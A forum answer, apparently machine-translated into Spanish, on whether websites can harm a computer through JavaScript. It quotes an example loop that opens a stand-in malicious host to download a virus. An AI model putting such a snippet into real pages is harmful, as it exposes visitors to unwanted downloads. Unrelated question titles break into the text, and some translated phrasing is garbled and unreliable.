Si. Siempre hay formas, por supuesto. Pero su riesgo disminuye un montón si desactiva JavaScript
Vladislav Zorov ha hecho algunos puntos realmente buenos sobre sitios web dañinos. Pero hay un lado más de la historia.
La mayoría de las “malas experiencias” provienen de un desarrollador imbécil que decidió poner:
- ¿Cuáles son algunos de los primeros pasos esenciales que debe seguir un desarrollador de software después de pasar de una computadora portátil con Windows 7 a una Macbook Pro?
- ¿La Chromebook está subestimada?
- ¿Es posible hacer mejores resistencias para computadoras?
- Cómo incluir partes físicas de una computadora en el código
- ¿Por qué mi computadora estaría haciendo cosas sola? (Ver comentario para más explicaciones, por favor).
“For (;;) {alert (” spam troll lol pwned “); } “. O posiblemente “para (;;) {window.open (” http://www.evilsite.com/virus.ex…} “. Pero los navegadores tienen protección contra ese tipo de cosas ahora, y ese tipo de ataques han sido corregido
Por supuesto, podríamos hacer un desbordamiento de búfer, etc. y hacer estallar la computadora.
Si está utilizando Internet Explorer <8, es un candidato principal para los ataques de secuencias de comandos ActiveX. Básicamente, literalmente puede ejecutar programas arbitrarios en su computadora, descargar archivos discretamente (no mostrar al usuario), eliminar archivos aleatorios, etc.
Si está utilizando Google Chrome y Firefox, entonces sus páginas están en una caja de arena, incapaz de llegar al mundo real.
Su computadora corre mucho más peligro por los programas que descarga y los archivos adjuntos que abre. JavaScript es más útil que perjudicial. Si usa un buen navegador, sus posibilidades de que los sitios web eliminen sus archivos son astronómicamente lentas. Descargar cosas, por otro lado, no tiene nada que ver con JavaScript